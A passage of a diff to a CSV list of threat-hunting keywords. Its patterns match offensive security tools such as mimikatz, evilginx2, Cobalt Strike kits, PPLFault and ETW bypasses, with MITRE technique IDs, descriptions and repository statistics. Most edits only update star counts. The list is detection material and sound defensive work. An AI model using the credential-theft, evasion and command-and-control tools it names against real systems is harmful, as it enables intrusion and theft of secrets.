T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*ETWEventSubscription*Program.cs*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*ETWEventSubscription.exe* -ProcStart *","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*ETWEventSubscription.exe* -UserLogon*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*etw-fuck.exe *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*EtwHash.exe*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*EtwHash.git*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*ETWHash.sln*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*etwti-hook.*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*evasion/has_recycle_bin.*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" -"*evasion_shellcode.js*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*event::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*event::drop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*evasion_shellcode.js*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*event::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*event::drop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*EventAggregation.dll.bak*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*EventAggregation.dll.bak*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*EventAggregation.dll.patched*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*EventAggregationPH.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*EventAggregation.dll.bak*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*EventAggregation.dll.patched*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*EventAggregationPH.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*eventlog -risk-i-know*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*eventlog_fucker.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*eventspy.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" @@ -9949,36 +10098,36 @@ "*EventViewerUAC.x64*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*EventViewerUAC.x86*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*EventViewerUAC_BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" -"*eventvwr_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*eventvwr_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*evilclippy *","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippy.exe*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" "*EvilClippy.exe*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippyManager.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippy-master*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" "*EvilClippyMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*evilfeed.go*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" -"*evilginx*","offensive_tool_keyword","evilginx","evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server. making it extremely easy to set up and use","T1556 - T1565 - T1056 - T1558 - T1110","TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8326","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" -"*evilginx.exe*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8326","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" -"*evilginx2*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8326","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" -"*evilginx-linux*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" -"*evilginx-mastery*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8326","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" -"*evilgophish*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - 